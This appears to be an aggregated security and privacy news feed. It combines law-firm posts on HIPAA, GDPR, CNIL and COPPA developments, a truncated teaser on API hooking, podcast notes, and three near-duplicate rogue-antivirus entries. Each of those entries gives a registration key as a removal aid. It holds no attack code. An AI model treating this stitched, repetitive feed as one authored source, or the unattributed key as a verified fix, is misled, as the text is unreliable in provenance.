On March 18, 2014, Hunton & Williams’ Global Privacy and Cybersecurity practice group hosted the latest webcast in its Hunton Global Privacy Update series. The program focused on some of the recent developments in privacy, including observations from the International Association of Privacy Professionals’ Global Privacy Summit in Washington, D.C., earlier this month, the National Institute of Standards and Technology’s final Cybersecurity Framework, and the Article 29 Working Party’s recent Opinion on Binding Corporate Rules and Cross-Border Privacy Rules.

Listen to a recording of the March 2014 Hunton Global Privacy Update.

Previous recordings of the Hunton Global Privacy Updates may be accessed under the Multimedia Resources section of our privacy blog.

Hunton Global Privacy Update sessions are 30 minutes in length and are scheduled to take place every two months. The next Privacy Update is slated for May 14, 2014.

Code Injection and API Hooking Techniques

Hooking covers a range of techniques used for many purposes, such as debugging, monitoring, intercepting messages, and extending functionality. Hooking is also used by many rootkits to camouflage themselves on the system. Rootkits use various hooking techniques when they have to hide a process, hide a network port, redirect file writes to some different […]

HHS Announces Pre-Audit HIPAA Surveys

The Department of Health and Human Services’ Office for Civil Rights (“OCR”) recently announced that it intends to survey up to 1,200 covered entities and business associates to determine their suitability for a more comprehensive HIPAA compliance audit. In a notice published in the Federal Register, OCR stated that the survey will collect information such as “number of patient visits or insured lives, use of electronic information, revenue, and business locations” to assess the organizations’ “size, complexity and fitness” for an audit.

The Health Information Technology for Economic and Clinical Health (“HITECH”) Act requires OCR to “provide for periodic audits to ensure that covered entities and business associates” are complying with the HITECH Act and its implementing regulations. HHS conducted an audit of 115 covered entities in 2012. That audit found that compliance with the HIPAA Security Rule was lacking – notably, roughly two out of three audited entities did not have a complete and accurate risk assessment. It also found that many entities were unaware of specific HIPAA Privacy Rule requirements, such as the obligation to provide a notice of privacy practices to individuals.

Although the total number of audits in 2014 is uncertain, expanding the audit program will provide a clearer picture of the extent of HIPAA compliance by business associates.

Read about our prior coverage of the HIPAA audit protocol.

Brazil Removes Local Data Storage Requirement from Internet Bill

On March 18, 2014, Brazilian lawmakers announced the withdrawal of a provision in pending legislation that would have required Internet companies to store Brazilian users’ data within the country.

The Marco Civil da Internet (“Marco Civil”), a draft bill introduced in the Brazilian Congress in 2011, proposes Brazil’s first set of Internet regulations, including requirements regarding personal data protection and net neutrality. As we previously reported, the Marco Civil received renewed attention last year in the wake of revelations that the U.S. National Security Agency’s PRISM surveillance program may have monitored digital communications in Brazil. In response, the Marco Civil was amended to add a local data storage requirement for Brazilian data. The provision generated controversy and opposition from Internet companies that claimed complying with the requirement would be expensive and burdensome.

According to reports, the legislation now states that global Internet companies “are subject to Brazilian laws in cases involving information on Brazilians even if the data is stored abroad.”

Windows Pro Defence Kit

Windows Pro Defence Kit is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Security Master, Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master

To register (and help removal), copy and paste this code: 0W000-000B0-00T00-E0021

New French Law Authorizes the CNIL to Conduct Online Inspections

On March 18, 2014, a new French consumer law (Law No. 2014-344) was published in the Journal Officiel de la République Française. The new law strengthens the investigative powers of the French Data Protection Authority (the “CNIL”) by giving the CNIL the ability to conduct online inspections.

Currently, the CNIL may conduct three types of investigations:

  • On-site inspections – the CNIL may visit a company’s facilities and access anything that stores personal data (e.g., servers, computers, applications). On-site inspections currently represent the vast majority of the inspections conducted by the CNIL.
  • Document reviews – these inspections allow the CNIL to require an entity to disclose documents or files (upon written request).
  • Hearings – the CNIL may summon representatives of organizations to appear for questioning and to provide other necessary information.

Under its new online inspection authority, the CNIL may now also identify violations of the French Data Protection Act through remote investigations. For example, this new investigative power will enable the CNIL to check whether online privacy notices comply with French data protection law, and to verify whether entities obtain users’ prior consent before sending electronic marketing communications.

The CNIL emphasized that the new online investigations will concern only publicly available data, and that the law does not give the CNIL the right to circumvent security measures to gain access to information systems.

In 2013, the CNIL conducted 414 inspections. In light of this new online investigation tool, even more inspections are likely in 2014.

Inventor of the World Wide Web Calls for an Online Constitution

On the 25th anniversary of his first proposal for what would become the World Wide Web (the “Web”), Sir Timothy John “Tim” Berners-Lee expressed concern at what he sees as the increasing threat that governments and commercial interests pose to the openness and accessibility of the Web. In a wide-ranging interview with the UK’s The Guardian newspaper, Berners-Lee criticized the approach that some lawmakers have taken on issues such as net neutrality and copyright legislation, as well as the decision by some countries to limit access to the wider Internet. He also called for an end to the control that the U.S. Department of Commerce exerts over the Internet Domain Name System.

To address these concerns, Berners-Lee has proposed the creation of a “global constitution,” a digital equivalent of the Universal Declaration of Human Rights, to guarantee the free flow of information and to foster collaboration and creativity over the open Web. This proposal is being presented by the Web We Want campaign, which is overseen by the World Wide Web Foundation. The campaign will provide small grants to organizations that promote the principles of open access to the Web, and aim to raise public awareness of these issues. Whether the campaign will lead to tangible change remains to be seen, but it is clear that the debate over the question of online rights is far from over.

FTC Acts on Several Industry COPPA Proposals

The Federal Trade Commission recently acted on three industry proposals in accordance with the new Children’s Online Privacy Protection Rule (the “COPPA Rule”) that came into effect July 1, 2013. Specifically, the FTC determined that it was unnecessary to rule on a proposed parental consent mechanism, approved a proposed “safe harbor” program and is seeking public comment on a separate proposed “safe harbor” program.

The COPPA Rule requires operators of certain websites and online services to obtain a parent’s consent before collecting personal information online from a child under the age of 13. In addition to the acceptable methods for obtaining the required parental consent listed in the COPPA Rule, the FTC’s revisions also allow entities to propose their own parental consent mechanisms for approval by the Commission. On February 25, 2014, the FTC determined that it was unnecessary to rule on a proposed parental consent mechanism submitted by iVeriFly, Inc. (“iVeriFly”) because iVeriFly’s proposal was merely a variation on existing parental consent mechanisms already recognized by the COPPA Rule or approved by the FTC.

In addition, the COPPA Rule permits industry to propose self-regulatory guidelines that implement the COPPA Rule’s protections. If the FTC approves a set of self-regulatory guidelines, companies that comply with those guidelines are protected (i.e., receive “safe harbor”) from FTC enforcement under the COPPA Rule. On February 12, 2014, the FTC announced that it approved a safe harbor program submitted by the kidSAFE Seal Program (“kidSAFE”). In the announcement, the FTC stated that kidSAFE’s self-regulatory guidelines provided the “same or greater protections” for children under the age of 13 as those contained in the COPPA Rule.

On March 14, 2014, the FTC announced that it was seeking public comment on a separate proposed safe harbor program submitted by the Internet Keep Safe Coalition (“iKeepSafe”). The public comment period is open until April 21, 2014.

View the FTC’s letter to iVeriFly.

View the FTC’s letter to kidSAFE.

View the FTC’s notice in the Federal Register seeking comment on iKeepSafe’s proposal.

European Parliament Adopts Network and Information Security Directive

On March 13, 2014, the European Parliament voted to adopt the draft directive on measures to ensure a uniform level of network and information security (“NIS Directive”). The NIS Directive was proposed by the European Commission on February 7, 2013 as part of its cybersecurity strategy for the European Union. The NIS Directive aims to ensure a uniform level of cybersecurity across the EU. The European Parliament will next negotiate with the Council of the European Union to reach an agreement on the final text of the NIS Directive.

View the European Commission’s press release.

European Parliament Adopts Draft General Data Protection Regulation; Calls for Suspension of Safe Harbor

On March 12, 2014, the European Parliament formally adopted the compromise text of the proposed EU General Data Protection Regulation (the “Regulation”). The text adopted by the Parliament is unchanged from the text already approved by the Parliament’s Committee on Civil Liberties, Justice and Home Affairs in October of last year. The Parliament voted for the Regulation with 621 votes in favor, 10 against and 22 abstentions.

In addition to adopting the compromise text of the Regulation, the Parliament adopted the compromise text of the Police and Criminal Justice Directive (the “Directive”).

The next steps for both the Regulation and the Directive are for the EU Council of Ministers to formulate a position and for trilateral negotiations between the European Commission, Parliament and Council to begin.

Safe Harbor Suspension

The Parliament also passed a resolution setting forth its findings and recommendations regarding the National Security Agency (“NSA”) surveillance program. Among other things, the resolution calls for:

  • withholding the Parliament’s consent to the Transatlantic Trade and Investment Partnership if European data protection principles are not fully respected;
  • suspending the Terrorist Finance Tracking Program until alleged breaches of the underlying data disclosure agreements have been fully clarified; and
  • suspending the Safe Harbor Framework immediately, alleging it does not adequately protect European citizens.

The Parliament’s resolution does not have immediate consequences for the validity of the Safe Harbor Framework. The underlying agreements relating to the Safe Harbor Framework were entered into by the European Commission, and in Europe, the Commission alone is in a position to formally renegotiate the agreements.

HHS Settles Potential HIPAA Violations with County Government

On March 7, 2014, the Department of Health and Human Services (“HHS”) announced a resolution agreement and $215,000 settlement with Skagit County, Washington, following a security breach that affected approximately 1,600 individuals.

The HHS Office for Civil Rights (“OCR”) investigated Skagit County after learning that unauthorized individuals had accessed receipts containing the protected health information (“PHI”) of patients of Skagit County’s Public Health Department. The receipts had been mistakenly stored on a publicly accessible server. During the investigation, OCR discovered that more PHI had been exposed in the incident, including information regarding the testing and treatment of infectious diseases. In the resolution agreement, OCR alleged that Skagit County had violated (1) the Privacy Rule by improperly disclosing PHI, (2) the Breach Notification Rule by not notifying all affected individuals, and (3) the Security Rule by failing to implement policies and procedures to prevent security violations and ensure compliance with the Security Rule and by not training its workforce.

Pursuant to the resolution agreement, Skagit County has agreed to pay a $215,000 settlement to HHS. In addition, the Corrective Action Plan attached to the resolution agreement requires Skagit County to:

  • provide substitute breach notification in print or broadcast media to all of the individuals affected by the incident;
  • submit its accounting of disclosures procedure, hybrid entity documentation and sample business associate agreement to HHS for review;
  • conduct a risk analysis as required by the Security Rule;
  • create or revise its HIPAA policies and procedures; and
  • provide HIPAA training to its workforce.

In announcing the resolution agreement, Susan McAndrew, Deputy Director of Health Information Privacy at OCR, stated that the case “sends a strong message” to local and county governments that they must “adopt a meaningful compliance program to ensure the privacy and security of patients’ information.”

View the resolution agreement.

German DPAs Issue Guidelines on CCTV Use

On March 10, 2014, the German Federal Commissioner for Data Protection and Freedom of Information and all 16 German state data protection authorities responsible for the private sector issued guidelines on the use of closed-circuit television (“CCTV”) by private companies. The guidelines provide information regarding the conditions under which CCTV may be used and outline the requirements for legal compliance. The guidelines feature:

  • general explanations of the legal framework, including the definitions of CCTV and public space, the legal requirements for assessments, required security measures, notice obligations and retention periods for images;
  • examples of how CCTV may be used by private companies in the public space (e.g., retail stores, restaurants), and a discussion of employee monitoring and other CCTV monitoring in non-public spaces; and
  • a list of questions that may be used as a checklist for data controllers and corporate data protection officers.

View a PDF of the Guidelines.

Windows Security Master

Windows Security Master is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master

To register (and help removal), copy and paste this code: 0W000-000B0-00T00-E0021

Former FTC Counsel Markus Heyder Joins Centre for Information Policy Leadership at Hunton

The Centre for Information Policy Leadership at Hunton & Williams LLP (the “Centre”) announces Markus B. Heyder, International Consumer Protection Counsel at the U.S. Federal Trade Commission, will be joining as Vice President and Senior Policy Counselor, effective March 17, 2014. In this role, Heyder will work on policy development, research and publishing activities at the Centre, and will develop and maintain relationships with policy and regulatory authorities in North America, Asia and Latin America, among other tasks. He will be resident in the firm’s Washington, D.C. office.

“Markus has a distinguished reputation as a privacy lawyer and brings an impressive background in global data privacy, information security and consumer protection law and policy, including with the FTC, the primary U.S. privacy authority. His 20 years of experience will be an asset to Centre member companies as we work together with regulators to explore more effective solutions to the privacy challenges we face in the information age,” said Bojana Bellamy, president of the Centre. “We are privileged to have Markus on board. His leadership will enhance the effectiveness and visibility of the Centre in the United States, Latin America and Asia-Pacific.”

“I am excited about both the challenges and opportunities this role brings and look forward to working with Centre members on our common mission,” said Heyder, who served in the FTC’s Office of International Affairs in Washington, D.C. for over 10 years. At the FTC, he specialized in the areas of privacy, information security, consumer protection, international policy development, cross-border enforcement, and cooperation and information sharing. Immediately prior to his government work, Heyder was associated with Lovells (now Hogan Lovells) in Chicago, where he focused on privacy law, consumer financial services law, financial privacy law and e-commerce.

Windows Defence Unit

Windows Defence Unit is a fake antivirus. This rogue displays fake alerts to scare users. It replaces Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master

To register (and help with removal), copy and paste this code: 0W000-000B0-00T00-E0021

Perl Compatible Regular Expressions – Episode 364, Part 2 – March, 6, 2014

In this tech segment we're going to talk about regular expressions in Python. We're going to be using Perl-style regular expressions, usually referred to as "PCRE". PCRE is used in many places outside Python, such as Snort and other IDS signatures; in most places you see regular expressions, it will be PCRE. Regex is a language, but it's far more restricted than a normal programming language.

If you need to perform any complex string search and replace, you're probably going to use regular expressions. As the famous saying goes: “Some people, when confronted with a problem, think ‘I know, I'll use regular expressions.’ Now they have two problems.”

So I'm going to teach you how to create some problems for yourself.

I'm going to put the testing strings in the show notes. If you want to play along, you don't need to install Python; we're going to use pythex, an online regular expression tester. I think this is the best way to demonstrate regular expressions without getting too bogged down in the context of code.

Interview with Eve Adams – Episode 364, Part 1 – March, 6, 2014

Eve Adams (@HackerHuntress) is Senior Talent Acquisition Expert at Halock Security Labs, a full-service information security advisory in Schaumburg, IL. Eve leverages her security staffing experience to drive recruitment for both internal Halock roles and client placement. She also spearheads Halock’s social media presence and counts Twitter as one of her most powerful recruiting tools. Eve’s passionate about information security, thinks most recruiters are doing it wrong, and naively believes technology can change the world for the better. In past lives, she has been a writer, translator and reptile specialist, among other things. While she is officially OS-agnostic, Eve usually runs Ubuntu at home.

U.S. FTC and UK ICO Sign Memorandum of Understanding

On March 6, 2014, the U.S. Federal Trade Commission (“FTC”) and UK Information Commissioner’s Office (“ICO”) signed a memorandum of understanding (“MOU”) to promote increased cooperation and information sharing between the two enforcement agencies.

The purpose of the MOU is to facilitate mutual assistance and the exchange of information in investigating and enforcing privacy violations. The MOU follows a number of international efforts to increase cross-border cooperation in privacy enforcement, including the OECD Recommendation on Cross-border Co-operation in the Enforcement of Laws Protecting Privacy, the GPEN Action Plan, the International Conference of Data Protection and Privacy Commissioners Resolution on International Enforcement Coordination, and the APEC Cooperation Arrangement for Cross-border Privacy Enforcement. In the increasingly interconnected and globalized world of today’s information age, regulators are recognizing the need to join forces to effectively investigate alleged privacy breaches and bring multilateral enforcement actions against companies operating in multiple jurisdictions.

In order to further common interests of cooperation, research and education, knowledge-sharing, and better understanding, the MOU sets out the FTC’s and ICO’s intentions, including to:

  • share information (including complaints);
  • provide investigative assistance in appropriate cases, such as obtaining evidence in the local jurisdiction on behalf of the other agency;
  • consider joint training programs and staff exchange; and
  • coordinate enforcement actions for privacy violations constituting breaches in both jurisdictions.

On its website, the ICO stated that the MOU will allow for closer cooperation between both organizations. The two agencies cooperated previously on a number of joint initiatives, including enforcing do-not-call and telemarketing laws. The ICO also has entered into a number of other memoranda of understanding with other authorities.

Article 29 Working Party Issues Opinion on BCR and APEC CBPR Requirements

On March 6, 2014 the Article 29 Working Party (the “Working Party”) published a comprehensive Opinion: Opinion 02/2014 on a referential for requirements for Binding Corporate Rules submitted to national Data Protection Authorities in the EU and Cross-Border Privacy Rules submitted to APEC CBPR Accountability Agents. This blog post provides an overview of the Opinion.

Background

Experts from EU data protection authorities (“DPAs”), along with their counterparts from the Asia-Pacific Economic Cooperation (“APEC”) Data Privacy Sub-Group developed a practical tool (the “Referential”) to reflect the respective requirements of the Binding Corporate Rules (“BCR”) and the Cross-Border Privacy Rules (“CBPR”) systems. The Referential lists the main elements generally required for submission of BCR to EU DPAs on the one hand, and those required to submit CBPRs to APEC CBPR recognized Accountability Agents on the other hand. The Referential was endorsed by APEC Senior Officials at their meeting on February 27-28, 2014, and the Working Party adopted its Opinion during its plenary meeting that took place on February 26-27, 2014.

Practical Checklist and Double Certification

The aim of the Referential is to provide an informal, practical checklist and comparative tool for organizations applying for BCR authorization and/or CBPR certification. It was developed to facilitate the design and adoption of data protection policies that comply with both systems. Although the Referential does not establish mutual recognition of both systems, according to the Working Party, it is intended to facilitate double certification. The Working Party also emphasizes that data protection policies of applicant companies operating in both regions must be approved separately by the relevant institutions in accordance with the applicable approval procedures for each system.

Common Requirements and Additional Elements

For each of the essential principles and requirements of the BCR and CBPR systems, the Referential lists the common elements as well as the additional elements that are specific to each system. The Working Party explicitly states that these additional elements must be taken into account by organizations applying for BCR or CBPR approval, but that the Referential does not affect individual authorization of BCR by EU DPAs or the certification of CBPR by APEC Accountability Agents. Further, the Referential does not affect enforcement by the relevant supervisory and/or enforcement authorities.

No Full Compatibility

The Working Party notes that significant differences exist between the requirements generally imposed by EU DPAs for BCR approval (in particular those deriving from EU data protection laws) and the CBPR program requirements. There also are differences between the respective objectives, scopes and review processes of the BCR and CBPR systems. Accordingly, certain BCR and CBPR requirements are not fully compatible.

Recommendations and Guidelines for Applicant Organizations

The Working Party recommends that applicant organizations provide clarity regarding their scope of data protection and privacy rules in order to avoid conflict with applicable laws. According to the Working Party, organizations must clearly specify in their applications the circumstances under which they intend to apply EU data protection laws and/or APEC CBPR program requirements.

The Working Party also notes that an organization’s data protection and privacy rules should be tailor-made to reflect the structure of the corporate group to which they apply, the data processing undertaken by the corporate group, and the policies and procedures that they have in place to protect personal data – EU DPAs and APEC Accountability Agents will not accept a straight “copy and paste” of the Referential.

In terms of scope of the two systems, the Working Party clarifies that CBPR certification is limited to organizations certified within a CBPR-participating Economy, and the scope of a particular organization’s CBPR certification will be limited to the entities, subsidiaries and affiliates identified in its application for CBPR certification. Similarly, the scope of a particular organization’s BCR will be limited to those entities, subsidiaries and affiliates identified in its application for BCR approval. An organization that wishes to transfer personal data from EU Member States to recipients located in non-EU countries may submit an application to the relevant national DPA in the EU for approval of its BCR.

If properly approved, the data protection and privacy rules applicable to cross border transfers of personal data can serve as the corporate group’s policy for all personal data processed by the corporate group as defined pursuant to its BCR and CBPR. Nevertheless, the Working Party emphasizes that EU data protection law requirements also apply where personal data is processed in the EU and, where personal data is processed in an APEC Economy, the laws of the relevant jurisdiction will apply.

OCR Releases HIPAA Privacy Rule Guidance on Mental Health Disclosures

The Department of Health and Human Services’ Office for Civil Rights (“OCR”) recently released guidance about the use and disclosure of mental health information. The guidance, entitled “HIPAA Privacy Rule and Sharing Information Related to Mental Health,” contains thirteen questions and answers that address the following topics:

  • Communicating mental health information to a patient’s family or friends;
  • Restricting the use and disclosure of psychotherapy notes;
  • Determining when a patient’s mental illness makes him or her incapacitated under the Privacy Rule;
  • Discussing the mental health conditions of minors with their parents;
  • Contacting law enforcement if a doctor is concerned about the patient’s safety or that the patient might harm someone else;
  • Disclosing to law enforcement when a patient is released after a temporary psychiatric hold; and
  • Sharing of a student’s mental health information by a school administrator, doctor or nurse and how such information is subject to the Family Educational Rights and Privacy Act.

In releasing the guidance, OCR noted that ensuring strong privacy protections is “critical to maintaining individuals’ trust in their health care providers and willingness to obtain needed health care services, and these protections are especially important” with respect to mental health information.

French Data Protection Authority Issues New Guidelines on E-Commerce and Direct Marketing

On March 5, 2014, the French Data Protection Authority (the “CNIL”) issued new guidelines in the form of five practical information sheets that address online purchases, direct marketing, contests and sweepstakes, and consumer tracking (the “Guidelines”).

Online Purchases

In the context of online purchases, the Guidelines make clear that online merchants must limit their use of bank card numbers and visual cryptograms. Once the transaction is complete, the merchants should not store or reuse the bank details of their customers without the customers’ prior consent. Although visual cryptograms should not be retained at all, the merchant may archive bank card numbers for up to 15 months (i.e., the time period during which a cardholder may challenge a charge).

Direct Marketing by Mail and Telephone

The Guidelines also focus on direct marketing by mail and telephone, reiterating that companies must (1) inform individuals of any possible commercial use of their personal data (either by the company itself or by business partners), and (2) enable individuals to object to such use when their data are collected.

Direct Marketing by Email, SMS and MMS 

Turning to electronic direct marketing, the Guidelines note that, with a few exceptions, companies must obtain the individual’s prior consent (“opt-in”) to send marketing communications by email, SMS and MMS.

Contests, Sweepstakes and Refer-a-Friend Programs 

With respect to contests and sweepstakes, the Guidelines emphasize that web users must be able to participate in online contests without being obligated to receive commercial communications. The Guidelines further clarify that the players’ electronic contact details may not be used for marketing purposes, except with the individual’s explicit consent.

Consumer Tracking 

Finally, the Guidelines address consumer tracking: the individual’s prior consent must be obtained when using geolocation information for commercial purposes, and when placing or accessing cookies or any other similar technologies on the user’s device. In certain cases, however, some cookies may be placed without the user’s prior consent, for example cookies used for security purposes with respect to a service requested by the user (such as online access to the user’s bank account information).

The CNIL issued these Guidelines to increase merchant and consumer awareness and to help all parties understand their respective rights and obligations under French data protection law. In 2012, 20% of the complaints the CNIL received were related to commercial practices, in particular, direct marketing. When conducting inspections, the CNIL found that the majority of French data protection law violations pertained to unfair or illicit collection of personal data, failing to provide (or providing inaccurate) information to individuals, and not honoring the right to object to personal data processing.

2014 IAPP Global Privacy Summit

